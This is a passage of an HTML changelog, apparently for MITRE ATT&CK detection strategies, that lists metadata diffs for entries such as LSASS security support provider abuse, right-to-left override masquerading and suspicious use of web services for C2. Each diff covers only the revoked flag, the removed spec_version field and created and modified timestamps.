style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.674000+00:00</td></tr></tbody></table></details><hr><h4>[DET0542] Registry and LSASS Monitoring for Security Support Provider Abuse</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.680000+00:00</td></tr></tbody></table></details><hr><h4>[DET0259] Remote Desktop Software Execution and Beaconing Detection</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.683000+00:00</td></tr></tbody></table></details><hr><h4>[DET0301] Removable Media Execution Chain Detection via File and Process Activity</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.683000+00:00</td></tr></tbody></table></details><hr><h4>[DET0005] Renamed Legitimate Utility Execution with Metadata Mismatch and Suspicious Path</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.691000+00:00</td></tr></tbody></table></details><hr><h4>[DET0267] Resource Hijacking Detection Strategy</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.676000+00:00</td></tr></tbody></table></details><hr><h4>[DET0527] Right-to-Left Override Masquerading Detection via Filename and Execution Context</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.691000+00:00</td></tr></tbody></table></details><hr><h4>[DET0016] Security Software Discovery Across Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.695000+00:00</td></tr></tbody></table></details><hr><h4>[DET0110] Setuid/Setgid Privilege Abuse Detection (Linux/macOS)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.690000+00:00</td></tr></tbody></table></details><hr><h4>[DET0162] Socket-filter trigger → on-host raw-socket activity → reverse connection (T1205.002)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.689000+00:00</td></tr></tbody></table></details><hr><h4>[DET0009] Supply-chain tamper in dependencies/dev-tools (manager→write/install→first-run→egress)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.696000+00:00</td></tr></tbody></table></details><hr><h4>[DET0310] Suspicious Addition to Local or Domain Groups</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.669000+00:00</td></tr></tbody></table></details><hr><h4>[DET0242] Suspicious Database Access and Dump Activity Across Environments (T1213.006)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.671000+00:00</td></tr></tbody></table></details><hr><h4>[DET0036] Suspicious Device Registration via Entra ID or MFA Platform</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.690000+00:00</td></tr></tbody></table></details><hr><h4>[DET0572] Suspicious RoleBinding or ClusterRoleBinding Assignment in Kubernetes</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.682000+00:00</td></tr></tbody></table></details><hr><h4>[DET0425] Suspicious Use of Web Services for C2</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 